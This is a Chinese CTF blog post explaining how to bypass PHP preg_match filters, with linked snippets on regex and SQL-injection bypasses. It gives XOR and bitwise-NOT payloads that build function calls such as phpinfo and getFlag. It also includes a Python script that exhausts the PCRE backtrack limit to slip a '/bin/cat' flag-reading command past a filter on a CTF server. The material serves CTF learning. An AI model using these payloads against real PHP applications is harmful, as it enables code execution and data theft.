正则绕过

最新推荐文章于 2025-02-12 11:59:17 发布
最新推荐文章于 2025-02-12 11:59:17 发布
阅读量2.2k 收藏 10
点赞数 4
分类专栏: CTF 文章标签: 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/v_wus/article/details/116720830
版权

正则绕过

一、preg_match()

1.异或绕过

使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字

str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/"

for i in range(0, len(str)):
    for j in range(0, len(str)):
        a = ord(str[i])^ord(str[j])
        print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a))

在这里插入图片描述
构造phpinfo()

$_="`{{{"^"?<>/";${$_}[_]();&_=phpinfo

2.取反绕过

urlencode(~"getFlag")
输出结果为:%98%9A%8B%B9%93%9E%98
payload:?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

在编码前加上 ~ 进行取反

3.取反拼接

~ 在 {} 中执行了取反操作,所以 ${~"\xa0\xb8\xba\xab"} 取反相当于 $_GET,拼接出了 $_GET’+’;,传入 +=getFlag() 从而执行了函数

payload:?code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&%aa=getFlag

4.取反加中文变量

payload:?code=$啊=(%27%5D%40%5C%60%40%40%5D%27^%27%3A%25%28%26%2C%21%3A%27);$啊();

5.异或(包括变量名)

payload:?code=${"!"^"~"}="]%];,<<"^":@)}@][";${"!"^"~"}();

6.利用正则回溯最大次数上限进行绕过

PHP 为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit。我们可以通过 var_dump(ini_get(‘pcre.backtrack_limit’));的方式查看当前环境下的上限。回溯次数上限默认是 100 万。那么,假设我们的回溯次数超过了 100 万,preg_match 返回的非 1 和 0,而是 false。

import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ecb402ec-0327-483b-bea3-90de34f04525.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

参考:PHP利用PCRE回溯次数限制绕过某些安全限制

preg_match函数,正则匹配绕过
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
正则绕过总结
qq_40327508的博客
09-28 8377
换行符绕过(%0a) <?php include("flag.php"); highlight_file(__FILE__); $c = $_GET['c']; if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag; }else{ echo "nonono"; } 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%5c绕过 <?ph.
常用的正则表达式
weixin_30394333的博客
07-10 240
基本符号: ^ 表示匹配字符串的开始位置 (例外 用在中括号中[ ] 时,可以理解为取反,表示不匹配括号中字符串) $ 表示匹配字符串的结束位置 * 表示匹配 零次到多次 + 表示匹配 一次到多次 (至少有一次) ? 表示匹配零次或一次 | 表示为或者,两项中取一项 ( ) 小括号表示匹配括号中全部字符 [ ] 中括号表示匹配括号中一个字...
2.11正则绕过相关知识点及练习
2401_88301161的博客
02-12 1061
一种用于匹配字符串的模式,常用于输入验证、搜索替换等场景,由普通字符(例如字符 a 到 z)以及特殊字符(称为"元字符")组成的文字模式可以用来检查一个串是否含有某种子串、将匹配的子串做替换或者从某个串中取出符合某个条件的子串等e.g.需要转义的特殊字符:$ ( ) * + .?[ \ ^ {在文本中遇到这几种特殊字符想转为文本,需要通过反斜杠\转义==>/$ ( ) * + .?[ \ ^ {/g。
CTF web题总结--绕过正则表达式
bob的博客
08-30 1万+
绕过正则表达式
利用正则表达式绕过
lml_0916的博客
07-19 571
这里匹配的时候,以select开头,匹配到了select后,\b匹配的就是边界,\s\S两个在一起使用的话就可以相当于匹配所有字符,“*”匹配0次或者多次;是科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,系统会认为这是两个命令,所以这样既没有报错,同时也绕过正则。但是也样并没有完全解决。可以看的出来,第二列存储的是登录密码,第三列是密码。由于上面出现的问题,我们想要绕过的话,就不让出现边界,也就是改变from的值(但是要保证是个单词,并且需要延长,还不能报错).
【红日Day6-CTF】PHP正则绕过
PZ的博客
01-12 2290
练习记录 复现代码: index.php // index.php <?php include 'flag.php'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $pass...
【代码审计】伪协议读取源码+正则绕过命令执行
serendipity1130的博客
10-21 772
1.首先打开页面查看源代码: 这里是一个简单的文件包含,使用伪协议进行读取: ?file=php://filter/convert.base64-encode/resource=mybackdoor.php 2.进行解码后读取到mybackdoor.php的源码,本题比较简单,主要学习两种正则绕过方式: <?php error_reporting(0); function blacklist($cmd){ $filter = "(\\<|\\>|Fl4g|php.
正则表达式绕过案例
cao_bo的博客
07-29 680
正则表达式绕过案例
CTF web新手解题 PHP 代码审计 正则绕过 文件包含 [鹤城杯 2021]Middle magic [鹤城杯 2021]EasyP
2302_80480639的博客
11-12 589
长路漫漫,唯web作伴。
正则绕过+eval函数
最新发布
03-10
### 正则表达式绕过 `eval` 函数安全限制的方法 在某些情况下,开发者可能会尝试使用正则表达式来过滤掉潜在危险的输入以防止恶意代码被执行。然而,在实际应用中这些措施可能并不完全有效。 对于给定的例子[^2]:...
正则表达式案例分析 (一)
weixin_34318326的博客
07-11 316
前言 最近在重新学习正则表达式,把在学习过程中所遇到的案例,还有比较难理解概念用自己的理解分析并整理总结。 如有哪些地方不对,欢迎指正,谢谢!(๑•ᴗ•๑) 本系列使用的JavaScript所支持的正则表达式语法,并推荐你使用 regexr.com/ 去做相应的练习。 假定你已经熟悉元字符,方括号,修饰符,量词及RegExp对象。 如果没有,请先看一遍文档www.w3school.com.cn/j...
正则表达式绕过案例
lin152235的博客
07-21 1207
正则表达式进行绕过,如果要绕过你需要在from前面不要出现不是单词边界,手动加入会报语法错误,所以这里需要考虑mysql中的科学计数法1e1来进行注入绕过,但是还是会出现一个问题就是使用科学计数法来进行查询会占一列,但是前面说到这个users中只有3列超过就会报错,所以直接使用group_concat来进行绕过,因为只能显示3列所以,我们将1,group_concat(…由orderby可以知道这个表一共有3列,那么我们就可以查看2,3列;可以看的出来,第二列存储的是登录密码,第三列是密码。...
BugkuCTF-字符?正则?,各种绕过,细心,urldecode二次编码绕过
veinard_F的博客
05-04 1716
字符?正则? 打开题目后出现一段代码 大致分析会发现需找到一个id满足前面的匹配才可以输出$key,即flag,本题主要考察有关正则表达式的内容。 “/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/i” 分析上述代码,首先需要一个key,而 . 表示匹配一个除换行符以外的所有字符,可以任意选择,比如a; * 表示匹配前面一个字符大于等于0次,为了简便选...
正则表达式绕过
lyz_yyds107的博客
07-29 379
科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,但是系统会认为这是两个命令,所以这样既没有报错,同时也绕过正则。我们发现不管咋样都能匹配到,所以搜索user可以搜到。我们已经知道了username和password。登录网站127.0.0.1/sqllabs/打开靶场发现因为列不一致,所以引发了报错。还是注入不了,这时候我们就要准备绕过啦。我们就可以用一种语法将第三列变成第四列。这时候我们就发现成功绕过了。查一下user是可以查到的。改成三列后发现没有报错。...
正则表达和绕过案例
senng的博客
07-19 893
正则表达式详解以及Linux三剑客中最重要的三个命令
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 679
正则表达式的学习
PCRE绕过正则
Aiwin的博客
06-19 1206
PCRE绕过正则和例题[NISACTF 2022]middlerce
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v_wus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值